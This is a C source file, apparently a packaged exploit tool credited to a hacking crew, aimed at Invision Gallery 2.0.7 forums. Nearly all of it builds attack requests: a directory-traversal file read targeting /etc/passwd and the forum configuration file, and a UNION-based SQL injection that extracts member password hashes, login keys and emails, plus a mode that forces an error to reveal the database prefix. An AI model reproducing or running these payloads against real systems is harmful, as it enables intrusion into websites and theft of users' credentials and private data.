
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int WSADATA ;


 int Exploit (char*,char*,char*) ;
 int MAKEWORD (int,int) ;
 int WSACleanup () ;
 int WSAStartup (int ,int *) ;
 int printf (char*) ;
 int strcat (char*,char*) ;
 scalar_t__ strcmp (char*,char*) ;
 int strcpy (char*,char*) ;

int main(int argc,char * argv[])
{
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2),&wsaData);

  printf("\n ...............................................................\n");
        printf("  Invision Gallery 2.0.7 ReadFile() & SQL injection exploit       \n");
        printf("         (c)oded by _1nf3ct0r_ // Hell Knights Crew               \n");
  printf("               http://hellknights.void.ru/                        \n");
  printf("  Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team   \n");
  printf(" ...............................................................  \n");

 if (argc == 1) {

printf("\n\n [+] ReadFile():\n");
printf("  - syntax:\n");
printf("  readfile 1 <host> <pathtoindex> <localfile> \n");
printf("  readfile 2 <host> <pathtoindex> <localfile>   -- try it 1f readfile[1] failed \n");
printf("  - params: \n");
printf("  <localfile> -  path to local file (../file), f0r example: ../../../../../etc/passwd\n");
printf("  s0, 1f u want to get local path to IPB 7ry th1s: ../../hellknightscrewxploit  \n");
printf("  - examples:\n");
printf("  readfile 1 asd.ru index.php ../../../../../../etc/passwd\n");
printf("  readfile 1 asd.ru forum/index.php ../../conf_global.php\n");
printf("  readfile 1 asd.ru forum/index.php ../../conf_global.php%00\n\n\n");
printf(" [+] SQL-injection:\n");
printf("  - syntax\n");
printf("  sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table>\n");
printf("  getprefix <host> <pathtoindex>   -- get database prefix from IPB error  \n");
printf("  - params:\n");
printf("  <member_id> -  member's id for SQL-injection result, for example: 1\n");
printf("  <column>    -  ipb members' column to get. for example: ip_adress, email.\n");
printf("  <table>     -  ipb table to use. f0r example: member\n");
printf("  <prefix>    -  database prefix. \n");
printf("  - examples:\n");
printf("  ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1  \n");
printf("  ig.exe sqlinject asd.ru index.php member_login_key  ibf_ members 1\n");
printf("  ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5\n\n");
             return 1;
                }

char * mode = argv[1];



if (strcmp(mode,"readfile")==0)
{
char * type = argv[2];
char * path = ((void*)0); path = argv[4];
char * localfile = argv[5];
char * host = argv[3];
 if (strcmp(type,"1")==0)
 {
 char exploit[1024];
 strcpy(exploit, "GET /");
 strcat(exploit, path);
 strcat(exploit, "?act=module&module=gallery&cmd=viewimage&img=&file_type=&dir=");
 strcat(exploit, localfile);
    strcat(exploit, " HTTP/1.0\r\nHost: ");
 strcat(exploit, host);
 strcat(exploit, "\r\n\r\n");
Exploit(exploit, "readfile", host);

 }
 else if (strcmp(type,"2")==0)
 {
 char exploit[1024];
 strcpy(exploit, "GET /");
 strcat(exploit, path);
 strcat(exploit, "?act=gallery&code=viewimage&img=index.gif&dir=");
 strcat(exploit, localfile);
    strcat(exploit, " HTTP/1.0\r\nHost: ");
 strcat(exploit, host);
 strcat(exploit, "\r\n\r\n");
Exploit(exploit, "readfile", host);
 }


}
if(strcmp(mode,"sqlinject")==0)
{
char * host = argv[2];
char * path = argv[3];
char * prefix = argv[5];
char * column = argv[4];
char * table = argv[6];
char * id = argv[7];

 char exploit[1024];
 strcpy(exploit, "GET /");
 strcat(exploit, path);
 strcat(exploit, "?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20union%20select%201,");
 strcat(exploit, column);
 strcat(exploit, ",1,1,1,1,1,1,1,1%20FROM%20");
 strcat(exploit, prefix);
 strcat(exploit, table);
 strcat(exploit, "%20WHERE%20id=");
 strcat(exploit, id);
 strcat(exploit, "/*31337*/");
    strcat(exploit, " HTTP/1.0\r\nHost: ");
 strcat(exploit, host);
 strcat(exploit, "\r\n\r\n");
    Exploit(exploit, "sqlinject", host);
}
if (strcmp(mode,"getprefix")==0)
{
char * path = argv[3];
char * host = argv[2];
 char exploit[1024];
 strcpy(exploit, "GET /");
 strcat(exploit, path);
 strcat(exploit, "?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20hellknightscrew");
    strcat(exploit, " HTTP/1.0\r\nHost: ");
 strcat(exploit, host);
 strcat(exploit, "\r\n\r\n");
printf("\n\n\n[!] u can get database prefix from this error. example: SELECT * FROM <PREFIX>gallery_albums\n\n");
Exploit(exploit, "readfile", host);
}

WSACleanup();
 return 0;
}
